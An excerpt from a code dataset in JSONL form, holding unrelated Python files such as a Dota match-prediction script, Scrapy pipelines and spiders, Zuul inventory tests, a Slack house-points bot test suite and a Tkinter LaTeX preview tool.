Максимальный ID героя: {N}.\")\r\n\r\n\r\ndef pick(data: pd.DataFrame) -> pd.DataFrame:\r\n X_pick = np.zeros((data.shape[0], N))\r\n\r\n for i, match_id in enumerate(data.index):\r\n for p in range(1, 6):\r\n X_pick[i, data.loc[match_id, f\"r{p}_hero\"] - 1] = 1\r\n X_pick[i, data.loc[match_id, f\"d{p}_hero\"] - 1] = -1\r\n\r\n return pd.DataFrame(X_pick, index=data.index, columns=[f\"hero_{i}\" for i in range(N)])\r\n\r\n\r\nX_pick = pick(dataframe)\r\nX_pick.head()\r\nX_train = pd.concat([X_train, X_pick], axis=1)\r\n\r\nscores = score_linear(X_train, y_train)\r\nbest_linear_score(scores)\r\nmodel = LogisticRegression(C=0.1, random_state=42)\r\nmodel.fit(X_train, y_train)\r\n\r\ntestframe = pd.read_csv(\"features_test.csv\", index_col=\"match_id\")\r\ntestframe.fillna(0, inplace=True)\r\n\r\nX_test = pd.DataFrame(scaler.transform(testframe), index=testframe.index, columns=testframe.columns)\r\nX_test.drop(cat_columns, axis=1, inplace=True)\r\nX_test = pd.concat([X_test, pick(testframe)], axis=1)\r\nX_test.head()\r\n\r\npredictions = pd.Series(model.predict_proba(X_test)[:, 1])\r\nprint(predictions.describe())\r\n","sub_path":"ML/final_task.py","file_name":"final_task.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"634553461","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\n\nimport pymysql\n\nclass LottoPipeline:\n def process_item(self, item, spider):\n return item\n\nclass LottoInsertNumberPipeline:\n\n def open_spider(self, spider):\n print(\"################################# open spider\")\n if spider.name == \"LottoSpider3\":\n conn = pymysql.connect(host=\"localhost\",\n database=\"exampledb\",\n user=\"root\",\n password=\"mysql\",\n charset=\"utf8\")\n \n self.conn = conn\n\n # 아래 with 구문은 테스트용 코드\n with self.conn.cursor() as cursor: # with가 종료될 때 cursor.close() 자동 호출\n sql = \"DELETE FROM WINNING_NUMBERS\"\n cursor.execute(sql) \n self.conn.commit() # 이전에 실행된 SQL 결과를 확정\n\n\n def process_item(self, item, spider):\n print(\"################################# process item\")\n if spider.name == \"LottoSpider3\":\n with self.conn.cursor() as cursor: # with가 종료될 때 cursor.close() 자동 호출\n sql = \"INSERT INTO winning_numbers values (%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n cursor.execute(sql, item.to_list()) \n self.conn.commit() # 이전에 실행된 SQL 결과를 확정\n\n return item\n\n def close_spider(self, spider):\n print(\"################################# close spider\")\n if spider.name == \"LottoSpider3\" and self.conn != None:\n self.conn.close()\n ","sub_path":"workspaces/python-basic/scrapy/lotto/lotto/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"431668234","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\Products\\ATGoogleMaps\\config.py\n# Compiled at: 2010-06-03 09:07:26\n\"\"\"Common configuration constants\n\"\"\"\nPROJECTNAME = 'ATGoogleMaps'\nADD_PERMISSIONS = {'GMap': 'ATGoogleMaps: Add GMap', \n 'GMarker': 'ATGoogleMaps: Add GMarker', \n 'GPolyline': 'ATGoogleMaps: Add GPolyline'}","sub_path":"pycfiles/Products.ATGoogleMaps-0.7-py2.6/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"35268470","text":"\"\"\"\nTest point counter functionality\n\"\"\"\nimport unittest\n\nfrom google.auth import exceptions\n\nfrom main import PointCounter, get_client\nfrom consts import ADMIN_CHANNEL\n\nTEST_PREFECTS = [\"prefect\"]\nTEST_POINTS = \"dataset/hackathon.test.json\"\n\n\nclass TestPointCounter(unittest.TestCase):\n \"\"\"Initialize a point counter and test response messages\"\"\"\n\n def setUp(self):\n self.p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n\n def test_post_update(self):\n try:\n get_client()\n except exceptions.DefaultCredentialsError:\n print(\"Skipping bucket test - no permission file found!\")\n return\n\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS, reset=True)\n p.award_points(\"6 points to Gryffindor\", TEST_PREFECTS[0])\n p.post_update()\n\n p2 = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n self.assertEqual(p2.points['Gryffindor'], 6)\n\n def test_adding_points(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n msg = p.award_points(\"10 points to Gryffindor\", TEST_PREFECTS[0])\n self.assertIn(\"<@prefect> Gryffindor gets 10 points\", msg[0])\n\n def test_parsing_edge_case(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n edge_cases = [\n \"1 point to gryffindor for <@U15BW22P9> ... 5 years ago\",\n \"....1 point to gryffindor\",\n ]\n for slack_msg in edge_cases:\n msg = p.award_points(\n slack_msg,\n TEST_PREFECTS[0])\n self.assertIn(\"<@prefect> Gryffindor gets 1 point\", msg[0])\n\n def test_adding_points_not_by_prefect(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n msg = p.award_points(\"6 points to Gryffindor\", \"harry potter\")\n for m in msg:\n self.assertIn(\"<@harry potter> Gryffindor gets 1 point\", m)\n\n def test_adding_one_point(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n msg = p.award_points(\"oNe point to Gryffindor\", \"harry potter\")\n for m in msg:\n self.assertIn(\"<@harry potter> Gryffindor gets 1 point\", m)\n\n def test_adding_one_point_to_slytherin(self):\n msg = self.p.award_points(\n \"1 point to slytherin for @benkraft making slackbot\"\n \" listen for '911' mentions in 1s and 0s\", \"harry potter\")\n for m in msg:\n self.assertIn(\"<@harry potter> Slytherin gets 1 point\", m)\n\n def test_subtracting_one_point_prefect(self):\n msgs = self.p.award_points(\"oNe point from Gryffindor\", \"prefect\")\n self.assertIn(\"<@prefect> Gryffindor loses 1 point\", msgs[0])\n\n def test_subtracting_one_point_not_prefect(self):\n msgs = self.p.award_points(\"oNe point from Gryffindor\", \"harry potter\")\n self.assertEqual(len(msgs), 0)\n\n def test_works_with_usernames(self):\n message = \"1 point to ravenclaw <@U0NJ1PH1R>\"\n for m in self.p.award_points(message, \"nymphadora tonks\"):\n self.assertIn(\"<@nymphadora tonks> Ravenclaw gets 1 point\", m)\n\n def test_works_with_dumbledore_with_prefect(self):\n message = \"Dumbledore awards 1 point to ravenclaw <@U0NJ1PH1R>\"\n for m in self.p.award_points(message, \"prefect\", channel=ADMIN_CHANNEL):\n self.assertEqual(\n m[0], \"awards 1 point to Ravenclaw :ravenclaw: :small_green_triangle_up:\")\n self.assertEqual(m[1], \"dumbledore\")\n\n def test_works_with_dumbledore_with_prefect_with_reason(self):\n message = \"Dumbledore awards 1 point to ravenclaw <@U0NJ1PH1R> for making reason works\"\n for m in self.p.award_points(message, \"prefect\", channel=ADMIN_CHANNEL):\n self.assertEqual(\n m[0], \"awards 1 point to Ravenclaw for making reason works :ravenclaw: 
:small_green_triangle_up:\")\n self.assertEqual(m[1], \"dumbledore\")\n\n def test_works_with_dumbledore_takes_away_with_prefect(self):\n self.p.award_points(\"10 points to Gryffindor\",\n TEST_PREFECTS[0], channel=ADMIN_CHANNEL)\n message = \"Dumbledore takes away 1 point from Gryffindor <@U0NJ1PH1R> because of breaking reason\"\n for m in self.p.award_points(message, \"prefect\"):\n self.assertEqual(\n m[0], \"takes away 1 point from Gryffindor for breaking reason \"\n \":gryffindor: :small_red_triangle_down:\")\n self.assertEqual(m[1], \"dumbledore\")\n\n def test_works_with_dumbledore_normal(self):\n message = \"awards 1 point to ravenclaw <@U0NJ1PH1R> for cheating\"\n for m in self.p.award_points(message, \"nymphadora tonks\", channel=ADMIN_CHANNEL):\n self.assertIn(\"<@nymphadora tonks> Ravenclaw gets 1 point\", m)\n\n def test_works_with_dumbledore_says_with_prefect(self):\n message = \"Dumbledore says ho ho ho :party-khan:\"\n msg = self.p.award_points(message, \"prefect\", channel=ADMIN_CHANNEL)\n self.assertIsInstance(msg[0], tuple)\n msg_text, char = msg[0]\n self.assertEqual(msg_text, \"ho ho ho :party-khan:\")\n self.assertEqual(char, \"dumbledore\")\n\n def test_works_with_dumbledore_says_no_prefect(self):\n message = \"Dumbledore says ho ho ho :party-khan:\"\n msg = self.p.award_points(\n message, \"Harry potter\", channel=ADMIN_CHANNEL)\n self.assertEqual(len(msg), 0)\n\n def test_calculate_standings(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n p.award_points(\"6 points to Gryffindor\", TEST_PREFECTS[0])\n p.award_points(\"7 points to Ravenclaw\", TEST_PREFECTS[0])\n p.award_points(\"8 points to Hufflepuff\", TEST_PREFECTS[0])\n p.award_points(\"9 points to Slytherin\", TEST_PREFECTS[0])\n for m in p.print_status():\n print(m)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"7606733","text":"\"\"\"\n创建三个学校且三个学校的设施内容等都是一致.\n\"\"\"\nclass School(object):\n def __init__(self, name, address):\n self.name = name\n self.address = address\n\n def speech(self):\n print('讲课')\n\nobj1 = School('老男孩北京校区', '美丽富饶的沙河')\nobj2 = School('老男孩上海校区', '浦东新区')\nobj3 = School('老男孩深圳校区', '南山区')\n\n\nclass Teacher(object):\n def __init__(self, name, age, salary):\n self.name = name\n self.age = age\n self.__salary = salary\n self.school = None\n\nt1 = Teacher('李杰', 19, 188888)\nt2 = Teacher('艳涛', 18, 60)\nt3 = Teacher('女神', 16, 900000)\n# ############## 老师分配校区\nt1.school = obj1\nt2.school = obj1\nt3.school = obj2\n# ####################################\n# 查看t1老师,所在的校区名称/地址\nprint(t1.school.name)\nprint(t1.school.address)\nprint(t1.name)\nprint(t1.age)\nt1.school.speech()\n","sub_path":"p1_basic/day22_26oop/day23/11_嵌套.py","file_name":"11_嵌套.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"131952477","text":"import os\nimport yaml\nimport pandas as pd\nimport argparse\n\ndef read_params(config_path):\n with open(config_path) as yaml_file:\n config=yaml.safe_load(yaml_file)\n return config\n\ndef get_data(config_path):\n config= read_params(config_path)\n data_path=config['data_source']['s3_source']\n df=pd.read_csv(data_path,sep=',',encoding='utf-8')\n #df = pd.get_dummies(df, columns = ['famhist'], drop_first=True)\n #df.drop(\"sbp\",axis=1, inplace=True)\n return df\n\nif __name__==\"__main__\":\n args = argparse.ArgumentParser()\n args.add_argument(\"--config\", default=\"param.yaml\")\n parsed_args = args.parse_args()\n data = get_data(config_path = parsed_args.config)","sub_path":"src/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"560120074","text":"# -*- coding: utf8 -*-\nfrom datetime import datetime\nimport re\n\nfrom scrapy.http import Request, HtmlResponse\nfrom scrapy.selector import Selector\n\nfrom alascrapy.spiders.base_spiders.ala_spider import AlaSpider\nfrom alascrapy.spiders.base_spiders.bazaarvoice_spider import BVNoSeleniumSpider\nfrom alascrapy.lib.generic import get_full_url, date_format\nimport alascrapy.lib.dao.incremental_scraping as incremental_utils\nfrom alascrapy.items import CategoryItem, ProductItem, ReviewItem, ProductIdItem\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom alascrapy.lib.selenium_browser import SeleniumBrowser\n\n\nclass Cyberphoto_seSpider(AlaSpider):\n name = 'cyberphoto_se'\n allowed_domains = ['cyberphoto.se']\n start_urls = ['https://www.cyberphoto.se/bloggen']\n\n \n def parse(self, response):\n \n original_url = response.url\n product = response.meta.get(\"product\", {})\n review = response.meta.get(\"review\", {})\n \n url_xpath = \"//span[contains(.,'ta sida')]/../@href\"\n single_url = self.extract(response.xpath(url_xpath))\n single_url='/bloggen'+single_url\n if single_url:\n matches = None\n if \"\":\n matches = re.search(\"\", single_url, re.IGNORECASE)\n if matches:\n single_url = matches.group(0)\n else:\n return\n single_url = get_full_url(original_url, single_url)\n \n request = Request(single_url, callback=self.parse)\n try:\n request.meta[\"product\"] = product\n except:\n pass\n try:\n request.meta[\"review\"] = review\n except:\n pass\n yield request\n urls_xpath = \"//div[@class='blogg_big_container'][contains(.,'Test')]//a[contains(@href,'article')]/@href\"\n params_regex = {}\n urls = self.extract_list(response.xpath(urls_xpath))\n \n for single_url in urls:\n matches = None\n if \"\":\n matches = re.search(\"\", single_url, re.IGNORECASE)\n if matches:\n single_url = matches.group(0)\n else:\n continue\n single_url = get_full_url(original_url, single_url)\n \n request = Request(single_url, callback=self.level_2)\n \n \n try:\n request.meta[\"product\"] = product\n except:\n pass\n try:\n request.meta[\"review\"] = review\n except:\n pass\n yield request\n \n def level_2(self, response):\n \n original_url = response.url\n product = response.meta.get(\"product\", {})\n review = response.meta.get(\"review\", {})\n \n category_leaf_xpath = \"(//div[@id='breadcrumb_area']/a/text())[last()]\"\n category_path_xpath = \"//div[@id='breadcrumb_area']/a/text()\"\n category = CategoryItem()\n category['category_url'] = original_url\n category['category_leaf'] = self.extract(response.xpath(category_leaf_xpath))\n category['category_path'] = self.extract_all(response.xpath(category_path_xpath), ' | ')\n if self.should_skip_category(category):\n return\n yield category\n\n product_xpaths = { \n \n \n \"ProductName\":\"(//div[@id='breadcrumb_area']/following-sibling::h1)[1]/text()\",\n \n \n \"OriginalCategoryName\":\"//div[@id='breadcrumb_area']/a/text()\",\n \n \n \"PicURL\":\"(//div[@class='picture_container']/img/@src)[1]\",\n \n \n }\n product = self.init_item_by_xpaths(response, \"product\", product_xpaths)\n product['TestUrl'] = original_url\n picurl = product.get(\"PicURL\", \"\")\n if picurl and picurl[:2] == \"//\":\n product[\"PicURL\"] = \"https:\" + product[\"PicURL\"]\n if picurl and picurl[:1] == \"/\":\n product[\"PicURL\"] = get_full_url(original_url, picurl)\n manuf = product.get(\"ProductManufacturer\", \"\")\n if manuf == \"\" and \"\"[:2] != \"//\":\n 
product[\"ProductManufacturer\"] = \"\"\n try:\n product[\"OriginalCategoryName\"] = category['category_path']\n except:\n pass\n ocn = product.get(\"OriginalCategoryName\", \"\")\n if ocn == \"\" and \"//div[@id='breadcrumb_area']/a/text()\"[:2] != \"//\":\n product[\"OriginalCategoryName\"] = \"//div[@id='breadcrumb_area']/a/text()\"\n review_xpaths = { \n \"ProductName\":\"(//div[@id='breadcrumb_area']/following-sibling::h1)[1]/text()\",\n \"TestDateText\":\"//p[contains(.,'Testad') and contains(.,'av')]/text()\",\n \"TestPros\":\"//*[contains(text(),'Plus') or contains(text(),'Mycket')]/../text()[normalize-space()]\",\n \"TestCons\":\"//*[contains(text(),'Minus') or contains(text(),'Mindre')]/../text()[normalize-space()]\",\n \"TestTitle\":\"(//div[@id='breadcrumb_area']/following-sibling::h1)[1]/text()\", \n }\n summary = self.extract_xpath(response, \"//div[@class='tabcontent']//p[text()][1]/text()\")\n verdict = self.extract_all_xpath(response, \n \"//*[contains(text(),'Slutsats') or contains(text(),'Sammanfattning')]/../text()[normalize-space()]\",\n separator=\"\\n\")\n match1 = re.search('Slutsats\\n+([^\\n]+)', verdict)\n match2 = re.search('Sammanfattning\\n+([^\\n]+)', verdict)\n if match1:\n verdict = match1.group(1)\n elif match2:\n verdict = match2.group(1)\n \n\n review = self.init_item_by_xpaths(response, \"review\", review_xpaths)\n review['TestUrl'] = original_url\n review['TestSummary'] = summary\n review['TestVerdict'] = verdict\n\n try:\n review['ProductName'] = product['ProductName']\n review['source_internal_id'] = product['source_internal_id']\n except:\n pass\n awpic_link = review.get(\"AwardPic\", \"\")\n if awpic_link and awpic_link[:2] == \"//\":\n review[\"AwardPic\"] = \"https:\" + review[\"AwardPic\"]\n if awpic_link and awpic_link[:1] == \"/\":\n review[\"AwardPic\"] = get_full_url(original_url, awpic_link)\n\n matches = None\n field_value = review.get(\"TestDateText\", \"\")\n if field_value:\n matches = re.search(\"(\\d{4}-\\d{2}-\\d{2})\", field_value, re.IGNORECASE)\n if matches:\n review[\"TestDateText\"] = matches.group(1)\n \n\n review[\"DBaseCategoryName\"] = \"PRO\"\n \n\n yield product\n\n\n \n \n yield review\n \n","sub_path":"alascrapy/spiders/cyberphoto_se.py","file_name":"cyberphoto_se.py","file_ext":"py","file_size_in_byte":7018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"23010831","text":"from Report import Report\n\nclass PPGReceivablesReportFactory(object):\n\n def __init__(self, projectdatabase, **kw):\n self.projectdatabase = projectdatabase\n self.params = kw\n\n def getReport(self):\n # create and fill the report\n report = Report('PPG Recievables Report')\n report.setReportHeaders((\n 'PPG Recievables Report',\n ),)\n report.setTableHeaders(((\n 'IMIS No.',\n 'Project Title',\n 'Executing Agency',\n 'GEF Grant',\n 'Total Disbursements',\n 'Total Expenditures',\n 'Receivable/(Payable)',\n ),))\n report.setTableRows(self.getReportData())\n # report.setTableTotals([])\n # report.setReportFooters()\n return report\n\n def getReportData(self):\n projects = self.params.get('projects', None)\n result = []\n for project in projects:\n ppg = project.fmi_folder.get('ppg', None)\n if ppg is not None:\n result.append((\n ppg.getIMISNumber(),\n project.project_general_info.Title(),\n project.project_general_info.getLeadExecutingAgencyNames(),\n ppg.getCommittedGEFGrant(),\n ppg.getSumCashDisbursements(),\n ppg.getSumYearlyExpenditures(),\n ppg.getAmountReceivable(),\n ))\n return result\n","sub_path":"unep.project-database/trunk/reports/PPGReceivablesReport.py","file_name":"PPGReceivablesReport.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"428424840","text":"# Copyright 2017 Red Hat, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport base64\nimport os\n\nimport yaml\n\nfrom tests.base import AnsibleZuulTestCase\nfrom tests.base import ZuulTestCase\n\n\nclass TestInventoryBase(ZuulTestCase):\n\n tenant_config_file = 'config/inventory/main.yaml'\n\n def setUp(self, python_path=None):\n super(TestInventoryBase, self).setUp()\n if python_path:\n self.fake_nodepool.python_path = python_path\n self.executor_server.hold_jobs_in_build = True\n A = self.fake_gerrit.addFakeChange('org/project', 'master', 'A')\n self.fake_gerrit.addEvent(A.getPatchsetCreatedEvent(1))\n self.waitUntilSettled()\n\n def _get_build_inventory(self, name):\n build = self.getBuildByName(name)\n inv_path = os.path.join(build.jobdir.root, 'ansible', 'inventory.yaml')\n return yaml.safe_load(open(inv_path, 'r'))\n\n def _get_setup_inventory(self, name):\n build = self.getBuildByName(name)\n setup_inv_path = os.path.join(build.jobdir.root, 'ansible',\n 'setup-inventory.yaml')\n return yaml.safe_load(open(setup_inv_path, 'r'))\n\n\nclass TestInventoryPythonPath(TestInventoryBase):\n\n def setUp(self):\n super(TestInventoryPythonPath, self).setUp(python_path='fake-python')\n\n def test_single_inventory(self):\n inventory = self._get_build_inventory('single-inventory')\n\n all_nodes = ('ubuntu-xenial',)\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n node_vars = inventory['all']['hosts'][node_name]\n self.assertEqual(\n 'fake-python', node_vars['ansible_python_interpreter'])\n\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'single-inventory')\n self.assertEqual(z_vars['message'], 'QQ==')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n\nclass TestInventory(TestInventoryBase):\n\n def test_single_inventory(self):\n\n inventory = self._get_build_inventory('single-inventory')\n\n all_nodes = ('ubuntu-xenial',)\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n node_vars = inventory['all']['hosts'][node_name]\n self.assertEqual(\n '/usr/bin/python2', node_vars['ansible_python_interpreter'])\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'single-inventory')\n self.assertEqual(z_vars['message'], 'QQ==')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_single_inventory_list(self):\n\n inventory = 
self._get_build_inventory('single-inventory-list')\n\n all_nodes = ('compute', 'controller')\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'single-inventory-list')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_group_inventory(self):\n\n inventory = self._get_build_inventory('group-inventory')\n\n all_nodes = ('controller', 'compute1', 'compute2')\n self.assertIn('all', inventory)\n self.assertIn('children', inventory['all'])\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for group_name in ('ceph-osd', 'ceph-monitor'):\n self.assertIn(group_name, inventory['all']['children'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n self.assertIn(node_name,\n inventory['all']['children']\n ['ceph-monitor']['hosts'])\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'group-inventory')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_hostvars_inventory(self):\n\n inventory = self._get_build_inventory('hostvars-inventory')\n\n all_nodes = ('default', 'fakeuser')\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n # check if the nodes use the correct username\n if node_name == 'fakeuser':\n username = 'fakeuser'\n else:\n username = 'zuul'\n self.assertEqual(\n inventory['all']['hosts'][node_name]['ansible_user'], username)\n\n # check if the nodes use the correct or no ansible_connection\n if node_name == 'windows':\n self.assertEqual(\n inventory['all']['hosts'][node_name]['ansible_connection'],\n 'winrm')\n else:\n self.assertEqual(\n 'local',\n inventory['all']['hosts'][node_name]['ansible_connection'])\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_setup_inventory(self):\n\n setup_inventory = self._get_setup_inventory('hostvars-inventory')\n inventory = self._get_build_inventory('hostvars-inventory')\n\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n\n self.assertIn('default', setup_inventory['all']['hosts'])\n self.assertIn('fakeuser', setup_inventory['all']['hosts'])\n self.assertIn('windows', setup_inventory['all']['hosts'])\n self.assertNotIn('network', setup_inventory['all']['hosts'])\n self.assertIn('default', inventory['all']['hosts'])\n self.assertIn('fakeuser', inventory['all']['hosts'])\n self.assertIn('windows', inventory['all']['hosts'])\n self.assertIn('network', inventory['all']['hosts'])\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n\nclass TestAnsibleInventory(AnsibleZuulTestCase):\n\n tenant_config_file = 'config/inventory/main.yaml'\n\n def _get_file(self, build, path):\n p = os.path.join(build.jobdir.root, path)\n with open(p) as f:\n return f.read()\n\n def _jinja2_message(self, expected_message):\n\n # This test runs a bit long and needs extra 
time.\n self.wait_timeout = 120\n # Keep the jobdir around to check inventory\n self.executor_server.keep_jobdir = True\n # Output extra ansible info so we might see errors.\n self.executor_server.verbose = True\n A = self.fake_gerrit.addFakeChange(\n 'org/project2', 'master', expected_message)\n self.fake_gerrit.addEvent(A.getPatchsetCreatedEvent(1))\n self.waitUntilSettled()\n self.assertHistory([\n dict(name='jinja2-message', result='SUCCESS', changes='1,1')])\n\n build = self.history[0]\n inv_path = os.path.join(build.jobdir.root, 'ansible', 'inventory.yaml')\n inventory = yaml.safe_load(open(inv_path, 'r'))\n\n decoded_message = base64.b64decode(\n inventory['all']['vars']['zuul']['message']).decode('utf-8')\n self.assertEqual(decoded_message, expected_message)\n\n obtained_message = self._get_file(self.history[0],\n 'work/logs/commit-message.txt')\n\n self.assertEqual(obtained_message, expected_message)\n\n def test_jinja2_message_brackets(self):\n self._jinja2_message(\"This message has {{ jinja2 }} in it \")\n\n def test_jinja2_message_raw(self):\n self._jinja2_message(\"This message has {% raw %} in {% endraw %} it \")\n\n\nclass TestWindowsInventory(TestInventoryBase):\n config_file = 'zuul-winrm.conf'\n\n def test_windows_inventory(self):\n\n inventory = self._get_build_inventory('hostvars-inventory')\n windows_host = inventory['all']['hosts']['windows']\n self.assertEqual(windows_host['ansible_connection'], 'winrm')\n self.assertEqual(\n windows_host['ansible_winrm_operation_timeout_sec'],\n '120')\n self.assertEqual(\n windows_host['ansible_winrm_read_timeout_sec'],\n '180')\n\n self.executor_server.release()\n self.waitUntilSettled()\n","sub_path":"tests/unit/test_inventory.py","file_name":"test_inventory.py","file_ext":"py","file_size_in_byte":9985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"172726745","text":"\n\"\"\" https://stackoverflow.com/questions/36636185/is-it-possible-for-python-to-display-latex-in-real-time-in-a-text-box \"\"\"\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nmatplotlib.use('TkAgg')\n\nfrom Tkinter import *\nfrom ttk import *\n\ndef graph(text):\n tmptext = entry.get()\n if tmptext == \"\":\n tmptext = \"waiting\\bfor\\binput\"\n tmptext = \"$\"+tmptext+\"$\"\n\n ax.clear()\n ax.text(0.2, 0.6, tmptext, fontsize = 20) \n canvas.draw()\n\n\nroot = Tk()\n\nmainframe = Frame(root)\nmainframe.pack()\n\ntext = StringVar()\nentry = Entry(mainframe, width=100, textvariable=text)\nentry.pack()\n\nlabel = Label(mainframe)\nlabel.pack()\n\nfig = matplotlib.figure.Figure(figsize=(4, 2), dpi=200)\nax = fig.add_subplot(111)\n\ncanvas = FigureCanvasTkAgg(fig, master=label)\ncanvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1)\ncanvas._tkcanvas.pack(side=TOP, fill=BOTH, expand=1)\n\nax.get_xaxis().set_visible(False)\nax.get_yaxis().set_visible(False)\n\n\n#Greek\ndef alpha(): \n entry.insert('insert', 'α')\ndef Beta(): \n entry.insert('insert', 'β')\ndef Gamma(): \n entry.insert('insert', 'γ')\ndef Delta(): \n entry.insert('insert', 'δ')\ndef Epsilon(): \n entry.insert('insert', 'ε')\ndef Theta(): \n entry.insert('insert', 'θ')\ndef Kappa(): \n entry.insert('insert', 'κ')\ndef Lambda(): \n entry.insert('insert', 'λ')\ndef Mu(): \n entry.insert('insert', 'μ')\ndef Xi(): \n entry.insert('insert', 'ξ')\ndef Pi(): \n entry.insert('insert', 'π')\ndef Rho(): \n entry.insert('insert', 'ρ')\ndef Sigma(): \n entry.insert('insert', 'σ')\ndef Tau(): \n entry.insert('insert', 'τ')\ndef Phi(): \n entry.insert('insert', 'φ')\ndef Chi(): \n entry.insert('insert', 'χ')\ndef Psi(): \n entry.insert('insert', 'ψ')\ndef Omega(): \n entry.insert('insert', 'ω')\n\nwid=30\nhei=30\n# Greek\nbtn_alpha = Button(root,text = 'α',command = alpha)\nbtn_alpha.place(x = 0,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'β',command = Beta)\nbtn_alpha.place(x = 0+wid*1,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'γ',command = Gamma)\nbtn_alpha.place(x = 0+wid*2,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'δ',command = Delta)\nbtn_alpha.place(x = 0+wid*3,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ε',command = Epsilon)\nbtn_alpha.place(x = 0+wid*4,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'θ',command = Theta)\nbtn_alpha.place(x = 0+wid*5,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'κ',command = Kappa)\nbtn_alpha.place(x = 0+wid*6,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'λ',command = Lambda)\nbtn_alpha.place(x = 0+wid*7,y = 350,width = wid,height = hei)\nbtn_alpha = 